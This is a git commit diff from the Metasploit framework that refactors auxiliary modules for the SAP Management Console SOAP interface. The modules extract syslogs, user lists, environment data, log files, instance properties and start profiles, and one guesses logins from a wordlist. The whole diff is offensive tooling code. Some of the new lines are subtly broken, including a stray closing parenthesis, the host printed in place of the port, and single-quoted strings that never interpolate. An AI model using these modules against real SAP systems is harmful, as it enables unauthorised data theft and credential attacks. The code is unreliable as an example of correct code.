Fixes more style and API usage issues
git-svn-id: file:///home/svn/framework3/trunk@11863 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
3b5c467c47
commit
2a90817b80
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('LFILE', [true, 'Set path to save output to file', 'abapsyslog']),
|
||||
], self.class)
|
||||
register_autofilter_ports([ 50013 ])
|
||||
deregister_options('RHOST')
|
||||
deregister_options('RHOST', 'LFILE')
|
||||
end
|
||||
|
||||
def rport
|
||||
|
@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def extractabap(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}:#{rhost} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
@ -99,33 +99,26 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
return :abort
|
||||
print_error("#{rhost}:#{rhost} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_status("[SAP] ABAP syslog downloading to: #{datastore['LFILE']}")
|
||||
|
||||
outputfile = datastore['LFILE'] + "_" + datastore['RHOST']
|
||||
print_status("Writing local file " + outputfile + " in XML format")
|
||||
|
||||
File.open(outputfile,'ab') do |f|
|
||||
f << res.body
|
||||
end
|
||||
|
||||
print_good("Saved file " + outputfile)
|
||||
print_status("#{rhost}:#{rport} [SAP] ABAP syslog downloading")
|
||||
print_status("#{rhost}:#{rport} [SAP] Storing looted SAP ABAP syslog XML file")
|
||||
store_loot("sap.abap.syslog", "text/xml", rhost, res.body, "sap_abap_syslog.xml", "SAP ABAP syslog")
|
||||
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] failed to access ABAPSyslog")
|
||||
print_error("#{rhost}:#{rport} [SAP] failed to access ABAPSyslog")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Using provided wordlist without modification")
|
||||
else
|
||||
print_status("SAPSID set to '#{datastore['SAP_SID']}' - Setting default SAP wordlist")
|
||||
datastore['USER_FILE'] = '/opt/metasploit3/msf3/data/wordlists/sap_common.txt'
|
||||
datastore['USER_FILE'] = Msf::Config.data_directory + '/wordlists/sap_common.txt'
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def enum_user(user, pass)
|
||||
if datastore['USER_FILE'] == '/opt/metasploit3/msf3/data/wordlists/sap_common.txt' and datastore['SAP_SID']
|
||||
if datastore['USER_FILE'] == Msf::Config.data_directory + '/wordlists/sap_common.txt' and datastore['SAP_SID']
|
||||
user = user.gsub("<SAPSID>", datastore["SAP_SID"].downcase)
|
||||
pass = pass.gsub("<SAPSID>", datastore["SAP_SID"])
|
||||
end
|
||||
|
@ -132,31 +132,32 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP #{rhost}] Unable to attempt authentication")
|
||||
print_error("#{rhost}:#{rport} [SAP #{rhost}] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP Management Console] Successful login '#{user}' password: '#{pass}'")
|
||||
print_good("#{rhost}:#{rport} [SAP Management Console] Successful login '#{user}' password: '#{pass}'")
|
||||
|
||||
if permission
|
||||
vprint_good("[SAP Management Console] Login '#{user}' authorized to perform OSExecute calls")
|
||||
vprint_good("#{rhost}:#{rport} [SAP Management Console] Login '#{user}' authorized to perform OSExecute calls")
|
||||
else
|
||||
vprint_error("[SAP Management Console] Login '#{user}' NOT authorized to perform OSExecute calls")
|
||||
vprint_error("#{rhost}:#{rport} [SAP Management Console] Login '#{user}' NOT authorized to perform OSExecute calls")
|
||||
end
|
||||
|
||||
report_auth_info(
|
||||
:host => rhost,
|
||||
:proto => 'tcp',
|
||||
:sname => 'sap-managementconsole',
|
||||
:proto => 'tcp',
|
||||
:port => rport,
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:target_host => rhost,
|
||||
:target_port => rport
|
||||
)
|
||||
return :next_user
|
||||
return
|
||||
else
|
||||
vprint_error("[SAP Management Console] failed to login as '#{user}' password: '#{pass}'")
|
||||
vprint_error("#{rhost}:#{rport} [SAP Management Console] failed to login as '#{user}' password: '#{pass}'")
|
||||
return
|
||||
end
|
||||
end
|
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def extractusers(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}:#{rhost} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
@ -100,16 +100,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
env = []
|
||||
|
||||
if res.code == 200
|
||||
case res.body
|
||||
when nil
|
||||
# Nothing
|
||||
when /<User>([^<]+)<\/User>/i
|
||||
body = []
|
||||
body = res.body
|
||||
users = body.scan(/<User>([^<]+)<\/User>/i)
|
||||
users = users.uniq
|
||||
success = true
|
||||
end
|
||||
body = []
|
||||
body = res.body unless res.body.nil?
|
||||
users = body.scan(/<User>([^<]+)<\/User>/i)
|
||||
users = users.uniq
|
||||
success = true
|
||||
|
||||
else res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
|
@ -119,27 +115,26 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication on #{rhost}:#{rport}")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] Users Extracted: #{users.length} entries extracted from #{rhost}:#{rport}")
|
||||
users.each do |output|
|
||||
print_good("#{output}")
|
||||
report_note(
|
||||
:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "#{output}")
|
||||
print_good("#{rhost}#{rport} [SAP] Users Extracted: #{users.length} entries extracted from #{rhost}:#{rport}")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:proto => 'tcp',
|
||||
:port => rport,
|
||||
:type => 'sap.users',
|
||||
:data => {:proto => "soap", :users => users},
|
||||
:update => :unique_data )
|
||||
end
|
||||
return
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] failed to access ABAPSyslog")
|
||||
print_error("#{rhost}#{rport} [SAP] failed to access ABAPSyslog on #{rhost}:#{rport}")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptString.new('LFILE', [false, 'Set path to save output to file', '']),
|
||||
], self.class)
|
||||
register_autofilter_ports([ 50013 ])
|
||||
deregister_options('RHOST')
|
||||
deregister_options('RHOST', 'LFILE')
|
||||
end
|
||||
|
||||
def rport
|
||||
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def getEnvironment(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}:#{rhost} [SAP] Connecting to SAP Management Console SOAP Interface ")
|
||||
success = false
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
@ -112,37 +112,32 @@ class Metasploit3 < Msf::Auxiliary
|
|||
else res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP #{rhost}] Unable to attempt authentication")
|
||||
print_error("#{rhost}:#{rhost} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] Environment Extracted: #{env.length} entries extracted")
|
||||
|
||||
if datastore['LFILE'] != ''
|
||||
outputfile = datastore['LFILE'] + "_" + datastore['RHOST']
|
||||
print_good("Writing local file " + outputfile + " in XML format.")
|
||||
File.open(outputfile,'ab') do |f|
|
||||
f << res.body
|
||||
end
|
||||
else
|
||||
env.each do |output|
|
||||
print_status("#{output}")
|
||||
end
|
||||
return
|
||||
end
|
||||
print_good("#{rhost}:#{rport} [SAP] Environment Extracted: #{env.length} entries extracted")
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:proto => 'tcp',
|
||||
:port => rport,
|
||||
:type => 'sap.env',
|
||||
:data => {:proto => "soap", :env => env},
|
||||
:update => :unique_data )
|
||||
)
|
||||
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rhost} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] failed to request environment")
|
||||
print_error("#{rhost}:#{rhost} [SAP] failed to request environment")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def gettfiles(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}:#{rhost} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
|
||||
soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
|
||||
|
@ -122,43 +122,32 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when nil
|
||||
# Nothing
|
||||
when /<name>([^<]+)<\/name>/i
|
||||
name = "#{$1}"
|
||||
name = $1.strip
|
||||
success = true
|
||||
end
|
||||
|
||||
else res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
print_error("#{rhost}:#{rhost} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] #{datastore['FILETYPE']}: #{datastore['RFILE']} downloaded from #{rhost}:#{rport}")
|
||||
|
||||
if datastore['LFILE'] != ''
|
||||
outputfile = datastore['LFILE'] + "_" + datastore['RHOST']
|
||||
print_status("Writing local file " + outputfile + " in XML format")
|
||||
File.open(outputfile,'ab') do |f|
|
||||
f << res.body
|
||||
end
|
||||
else
|
||||
env.each do |output|
|
||||
print_status("#{output}")
|
||||
end
|
||||
return
|
||||
end
|
||||
print_good("#{rhost}:#{rhost} [SAP] #{datastore['FILETYPE'].downcase}:#{datastore['RFILE'].downcase} looted")
|
||||
store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, res.body, "sap_#{datastore['RFILE'].downcase}.xml",
|
||||
"SAP Get Logfile")
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rhost} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] failed to request environment")
|
||||
print_error("#{rhost}:#{rhost} [SAP] failed to request environment")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -62,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def enum_instance(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}:#{rhost} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
soapenv='http://schemas.xmlsoap.org/soap/envelope/'
|
||||
xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
|
@ -98,114 +98,121 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if res.code == 200
|
||||
body = res.body
|
||||
if body.match(/<property>CentralServices<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
centralservices = "#{$1}"
|
||||
centralservices = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>SAPSYSTEM<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
sapsystem = "#{$1}"
|
||||
sapsystem = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>SAPSYSTEMNAME<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
sapsystemname = "#{$1}"
|
||||
sapsystemname = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>SAPLOCALHOST<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
saplocalhost = "#{$1}"
|
||||
saplocalhost = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>INSTANCE_NAME<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
instancename = "#{$1}"
|
||||
instancename = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>ICM<\/property><propertytype>NodeURL<\/propertytype><value>([^<]+)<\/value>/)
|
||||
icmurl = "#{$1}"
|
||||
icmurl = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>ABAP DB Connection<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
dbstring = "#{$1}"
|
||||
dbstring = $1.strip
|
||||
success = true
|
||||
end
|
||||
if body.match(/<property>protectedweb Webmethods<\/property><propertytype>Attribute<\/propertytype><value>([^<]+)<\/value>/)
|
||||
protectedweb = "#{$1}"
|
||||
protectedweb = $1.strip
|
||||
success = true
|
||||
end
|
||||
elsif res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
return :abort
|
||||
print_error("#{rhost}:#{rhost} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] Instance Properties Extracted from #{rhost}:#{rport}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] Instance Properties Extracted")
|
||||
if centralservices
|
||||
print_good("Central Services: #{centralservices}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] Central Services: #{centralservices}")
|
||||
end
|
||||
if sapsystem
|
||||
print_good("SAP System Number: #{sapsystem}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] SAP System Number: #{sapsystem}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP System Number: #{sapsystem}")
|
||||
:type => 'sap.sapsystem',
|
||||
:data => {:proto => "soap", :sapsystem => sapsystem})
|
||||
end
|
||||
if sapsystemname
|
||||
print_good("SAP System Name: #{sapsystemname}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] SAP System Name: #{sapsystemname}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP System Name: #{sapsystemname}")
|
||||
:type => 'sap.systemname',
|
||||
:data => {:proto => "soap", :sapsystemname => sapsystemname})
|
||||
end
|
||||
if saplocalhost
|
||||
print_good("SAP Localhost: #{saplocalhost}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] SAP Localhost: #{saplocalhost}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP Localhost: #{saplocalhost}")
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'sap.localhost',
|
||||
:data => {:proto => "soap", :saplocalhost => saplocalhost})
|
||||
end
|
||||
if instancename
|
||||
print_good("Instance Name: #{instancename}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] Instance Name: #{instancename}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP Instance Name: #{instancename}")
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'sap.instancename',
|
||||
:data => {:proto => "soap", :instancename => instancename})
|
||||
end
|
||||
if icmurl
|
||||
print_good("ICM URL: #{icmurl}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] ICM URL: #{icmurl}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP ICM URL: #{icmurl}")
|
||||
:type => 'sap.icm.url',
|
||||
:data => {:proto => "soap", :icmurl => icmurl})
|
||||
end
|
||||
|
||||
if dbstring
|
||||
print_good("DATABASE: #{dbstring}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] DATABASE: #{dbstring}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'SOAP',
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'SAP',
|
||||
:data => "SAP dbstring: #{dbstring}")
|
||||
:type => 'sap.dbstring',
|
||||
:data => {:proto => "soap", :dbstring => dbstring},
|
||||
:update => :unique_data )
|
||||
end
|
||||
|
||||
if protectedweb
|
||||
print_good("protectedweb Webmethods: #{protectedweb}")
|
||||
print_good("#{rhost}:#{rhost} [SAP] protectedweb Webmethods: #{protectedweb}")
|
||||
report_note(:host => '#{rhost}',
|
||||
:proto => 'tcp',
|
||||
:port => '#{rport}',
|
||||
:type => 'sap.protected.web.methods',
|
||||
:data => {:proto => "soap", :protectedweb => protectedweb},
|
||||
:update => :unique_data )
|
||||
end
|
||||
return
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rhost} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
else
|
||||
print_error("[SAP] failed to identify instance properties")
|
||||
print_error("#{rhost}:#{rhost} [SAP] failed to identify instance properties")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -110,48 +110,46 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when /<file>(.*)<\/file>/i
|
||||
body = []
|
||||
body = res.body
|
||||
env =body.scan(/<filename>(.*?)<\/filename><size>(.*?)<\/size><modtime>(.*?)<\/modtime>/i)
|
||||
env = body.scan(/<filename>(.*?)<\/filename><size>(.*?)<\/size><modtime>(.*?)<\/modtime>/i)
|
||||
success = true
|
||||
end
|
||||
elsif res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] #{datastore['FILETYPE']}: #{env.length} entries extracted from #{rhost}:#{rport}")
|
||||
print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}: #{env.length} entries extracted")
|
||||
|
||||
saptbl = Msf::Ui::Console::Table.new(
|
||||
Msf::Ui::Console::Table::Style::Default,
|
||||
'Header' => 'SAP Logfiles',
|
||||
'Prefix' => "\n",
|
||||
'Postfix' => "\n",
|
||||
'Columns' => [ 'Filename', 'Size', 'Date/Time' ]
|
||||
)
|
||||
|
||||
env.each do |output|
|
||||
#print_status("Filename: #{output[0]}\tSize: #{output[1]}\tDate: #{output[2]}")
|
||||
saptbl << [ output[0], output[1], output[2] ]
|
||||
end
|
||||
|
||||
print(saptbl.to_s)
|
||||
saptbl = Rex::Ui::Text::Table.new(
|
||||
'Header' => "SAP Log Files",
|
||||
'Indent' => 1,
|
||||
'Columns' =>
|
||||
[
|
||||
"Filename",
|
||||
"Size",
|
||||
"Timestamp"
|
||||
])
|
||||
store_loot("sap.#{datastore['FILETYPE'].downcase}file", "text/xml", rhost, saptbl.to_s, "sap_#{datastore['RFILE'].downcase}.xml",
|
||||
"SAP #{datastore['FILETYPE'].downcase}:#{datastore['RFILE'].downcase}")
|
||||
|
||||
|
||||
return
|
||||
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
print_error("#{rhost}:#{rport} [SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
|
||||
else
|
||||
print_error("[SAP] failed to request environment")
|
||||
print_error("#{rhost}:#{rport} [SAP] failed to request environment")
|
||||
return
|
||||
end
|
||||
end
|
||||
|
|
|
@ -63,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
def getStartProfile(rhost)
|
||||
verbose = datastore['VERBOSE']
|
||||
print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
|
||||
print_status("#{rhost}: #{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
|
||||
success = false
|
||||
soapenv ='http://schemas.xmlsoap.org/soap/envelope/'
|
||||
xsi ='http://www.w3.org/2001/XMLSchema-instance'
|
||||
|
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
when nil
|
||||
# Nothing
|
||||
when /<name>([^<]+)<\/name>/i
|
||||
name = "#{$1}"
|
||||
name = $1.strip
|
||||
success = true
|
||||
end
|
||||
|
||||
|
@ -120,33 +120,20 @@ class Metasploit3 < Msf::Auxiliary
|
|||
elsif res.code == 500
|
||||
case res.body
|
||||
when /<faultstring>(.*)<\/faultstring>/i
|
||||
faultcode = "#{$1}"
|
||||
faultcode = $1.strip
|
||||
fault = true
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionError
|
||||
print_error("[SAP] Unable to attempt authentication")
|
||||
return :abort
|
||||
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
|
||||
return
|
||||
end
|
||||
|
||||
if success
|
||||
print_good("[SAP] Startup Profile Extracted: #{name} from #{rhost}:#{rport}")
|
||||
|
||||
if datastore['LFILE'] != ''
|
||||
outputfile = datastore['LFILE'] + "_" + datastore['RHOST']
|
||||
print_good("Writing local file " + outputfile + " in XML format")
|
||||
File.open(outputfile,'ab') do |f|
|
||||
f << res.body
|
||||
end
|
||||
else
|
||||
env.each do |output|
|
||||
print_status("#{output}")
|
||||
end
|
||||
return
|
||||
end
|
||||
|
||||
print_good("#{rhost}:#{rport} [SAP] Startup Profile Extracted: #{name}")
|
||||
store_loot("sap.profile", "text/xml", rhost, res.body, "sap_profile.xml", "SAP Profile XML")
|
||||
elsif fault
|
||||
print_error("[SAP] Errorcode: #{faultcode}")
|
||||
return
|
||||
|
|
Loading…
Reference in New Issue